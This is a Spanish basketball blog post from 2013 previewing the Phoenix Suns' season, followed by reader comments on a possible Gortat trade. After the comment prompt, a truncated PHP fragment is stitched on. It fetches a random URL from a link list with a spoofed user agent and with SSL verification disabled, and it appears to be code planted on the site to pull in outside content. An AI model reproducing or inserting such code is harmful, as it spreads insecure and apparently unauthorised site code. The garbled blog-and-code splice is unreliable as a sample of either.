Phoenix Suns: Travesía por el desierto 2.0

06 de October de 2013 por Simon

17 de abril de 2013: ¿Por qué seguimos a Michael Beasley y “Wes” Johnson al mismo centro del desierto? ¿Por qué apostamos por ellos? Ahora estamos más perdidos que nunca. Seguimos andando por el desierto y poca esperanza nos queda ya.

27 de junio de 2013: Continuamos perdidos, aunque hoy hemos encontrado a dos jóvenes desorientados. El más alto de ellos se hace llamar Alex Len, un muchacho blanquito,  altísimo pero larguirucho. Creo que con el tiempo podría ser nuestro líder y guiarnos para salir de aquí. Con él iba otro jovencito, un tal Archie Goodwin. Ahora mismo no sabemos qué aportará en el futuro.

2 de julio de 2013: Hoy llega gente nueva al grupo, tres en concreto: Eric, Viacheslav e Ish pero para que se quedaran hemos tenido que dejar marchar a Jared Dudley. Eric es pequeñito pero muy fuertote, seguro que podrá guiarnos para terminar con este infierno. Los otros dos de momento sólo se dedican a hacer grupo sin provocar ningún altercado.

1 de octubre de 2013: Ahora todo empieza de nuevo. Por fin nos libramos de Michael Beasley. Se ha marchado una de nuestras piezas más importantes, Luis Scola. Mientras tanto, Bledsoe y Dragic por un lado se disputan el poder y Alex Len y Gortat disputan por ser nuestra referencia. Veremos qué tal se da esta nueva temporada…

Más o menos así es como me imagino el diario de un aficionado cualquiera de Phoenix que actúa de observador externo. Todas las apuestas que se realizaron el año pasado en Phoenix han acabado en desastre salvo la de Goran Dragic. El último puesto de la conferencia Oeste es la prueba.

Por suerte, la NBA da nuevas oportunidades cada año para resarcirse de los errores. Comienza una nueva temporada para Phoenix que tendrá difícil empeorar el desastre del año pasado, aunque tampoco es descartable. El equipo parece ligeramente mejor que el del año pasado pero también más joven e inexperto. De todas maneras  el futuro pinta más prometedor que el año anterior. 

El base titular será de nuevo Goran Dragic, de lo poco salvable la temporada anterior. Viene de jugar un buen eurobasket y se supone que empezará la temporada en buena forma, lo que le será vital en su duelo particular con la incorporación “estrella” de Phoenix, Eric “mini-Lebron” Bledsoe, presumiblemente su compañero en el backcourt.  Precisamente las primeras dudas sobre este equipo se ciernen sobre esta pareja. Ambos son buenos defensores e incluso sus habilidades en ataque pueden ser bastante compatibles. Ninguno es un playmaker al uso aunque ambos pueden asistir a buen ritmo y anotar con consistencia. También comparten algunos puntos débiles como la inconsistencia en el juego y una clara tendencia a perder el balón más asiduamente de lo deseado.  Sus recambios serán Kendall Marshall y Shannon Brown. Marshall debe dar un paso adelante si quiere tener futuro en Phoenix. Si no logra hacerse un hueco en la rotación este año no me extrañaría verle hacer las maletas el año que viene. No le será fácil puesto que el año pasado dio muestras de estar muy verde para jugar en la NBA. A su favor juega que es el único jugador de corte distinto a los rivales que tiene para hacerse con minutos. Por su parte, Shannon Brown ejercerá un año más de escolta suplente. Aportará tiro exterior, capacidad atlética y algunas jugadas espectaculares. Por completar la rotación lucharán Ish Smith, que puede comerle la tostada a Marshall gracias a su velocidad y buena visión de juego, y Archie Goodwin, que puede ser el gran robo del Draft tras las buenas sensaciones que dejó en la summer league.

En el puesto de alero no vemos claro quién puede ser el elegido. PJ Tucker y el recién llegado Gerald Green son los aleros naturales del equipo pero ambos tienen un nivel bastante bajo. El buen final de temporada del primero puede abrirle las puertas de la titularidad en un principio donde aportará fuerza, efectividad en ataque y defensa. Capacidad atlética y ayuda en la anotación es lo que cabría esperar de Gerald Green, aunque tras su flojo año en Indiana mejor no asegurar nada. No es descartable ver algunos minutos en el puesto de alero a alguno de los gemelos Morris.

Los dos hermanos serán los ala-pívots del equipo. Markieff parte con ventaja respecto a su hermano Marcus. Ambos son jugadores de corte muy parecido, buenos lanzadores de media distancia, mejorables jugadores defensivos y con buena visión y entendimiento del juego. Markieff es más efectivo desde lejos mientras que Marcus juega mejor en el poste bajo, donde Markieff tiene menos movimientos y recursos.  Alternando la posición de 4 y 5 podremos ver al recuperado Channing  Frye poniendo su tiro exterior a disposición de Phoenix para abrir las defensas de manera que Dragic y Bledsoe puedan hacer de las suyas. El rookie Alex Oriakhi es otro jugador que estará en plantilla pero tiene muy difícil hacerse un hueco.

Para terminar llegamos a la zona caliente. El pívot titular en el primer partido de la temporada será Marcin Gortat. El jugador polaco es desde hace algunas temporadas la referencia interior en el equipo de Arizona lo que le da los suficientes galones para, de momento, estar por encima de la gran apuesta de Phoenix, Alex Len. Gortat descubrió la pasada temporada que la vida sin Nash no era tan maravillosa pero aún así hizo un buen trabajo y se mostró como un pívot sólido aportando buenos números al equipo. Alex Len ha llegado a la franquicia tras ser elegido con el número 5 del draft, a pesar de que muchos apostaban por él como número 1. Aunque ahora mismo le falta peso y fuerza para competir en NBA tiene muy buenos fundamentos y mucho margen de mejora en ataque. En defensa, si está centrado, también puede ser un muy buen jugador en cuento mejore su físico. Las mayores dudas sobre su figura aparecen por su tendencia a relajarse y por su poca ética de trabajo. Veremos qué cara muestra en la NBA. Marcin Gortat no va a ser suplente en este equipo por lo que si Alex Len rinde a un buen nivel le veremos salir a cambio de algún alero y alguna primera ronda de Draft. Para los minutos de la basura habrá otro ucraniano, Viacheslav Kravtsov, toda una presencia defensiva aunque muy limitado en ataque.

La plantilla de Phoenix, a pesar de tener muchos defectos, es atractiva para el espectador ya que está formada por varios jugadores capaces de hacer cosas interesantes. Será vital para no ser últimos que se entiendan y remen todos en la misma dirección. Sus puntos fuertes, y por lo que deben apostar, son el talento, el descaro y la velocidad. Tienen un defecto muy marcado y es la falta de altura de su juego exterior que le puede ocasionar muchos problemas atrás a pesar de contar con defensores bastante capaces. Si alguien es capaz de poner cordura en el juego de estos chavales seguro que aunque no lleguen las victorias van a ser un equipo muy entretenido e interesante de ver.

Quinteto inicial: Goran Dragic, Eric Bledsoe, PJ Tucker, Markieff Morris y Marcin Gortat
Sexto hombre: Alex Len

Pronóstico: Penúltimos del Oeste. Con suerte alcanzarán las 30 victorias.

Comenta

5 comentarios a esta entrada

  1. rumbero dice:
    #1

    La vida sin Nash no es tan maravillosa para Gortat y para los Suns en general.
    A ver como le va al combo Dragic – Bledsoe que puede ser de lo más divertido de ver en Phoenix esta temporada. A partir de aquí yo creo que deberían intentar sacar algo de provecho por Gortat y minutos para Len y Goodwin (como comentas con 18 años puede ser una de las pilladas del draft) porque poquito más tienen. Se jugarán con Utah la penúltima plaza del oeste y a cruzar los dedos en el draft

      Citar

  2. Denise dice:
    #2

    Gortat es expiring y a poco que Len haga algo decente va a salir si o si de Phoenix en febrero (sino antes). Los contenders al anillo se van a dar tortas por conseguir al polaco para reforzar su pintura de cara a los Playoffs y los Suns seguro van a aprovechar la ocasión para sacar una buena tajada.
    Con eso, un Top 5 del proximo draft y un equipo poco hipotecado salarialmente, la travesía no creo que sea muy larga. Eso si, este año junto a Utah y PHI, son uno de los 3 peores equipos de la liga y ganar 25 partidos ya sería un milagro.
    Del que espero más este año es de Kendall Marshall, probablemente el mayor bluff de la pasada hornada de rookies.

      Citar

  3. Esteban dice:
    #3

    untrade gortat por perkins y la primera ronda del thunder me parece un buen negocio para ambos

    el thunder necesita un pivote algo mejor que perkins y sin martin ni harden, que tambien puede aportar algun puntito

    los suns deben sumar rondas y aunque gortat es un buen jugaodr, su valor tampoco es tan elevado ya que sera agente libre sin restricciones la proxima temporada

      Citar

  4. sempren dice:
    #4

    Una primera ronda de los Thunder no es gran cosa; otro tema sería si tienen alguna primera ronda de otro equipo que no juegue PO, sino me parece un poco robo…

      Citar

  5. Esteban dice:
    #5

    sempren:
    Una primera ronda de los Thunder no es gran cosa; otro tema sería si tienen alguna primera ronda de otro equipo que no juegue PO, sino me parece un poco robo…

    es q es dificil q un equipo que no vaya a jugar PO este interesado en sacrificar su ronda de loteria por un gortat que no los va a sacar de pobre

    gortat podra ir a un equipo que busque PO y los suns no van a sacar mucho por el

    dallas seria otro equipo q puede estar muy interesado

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>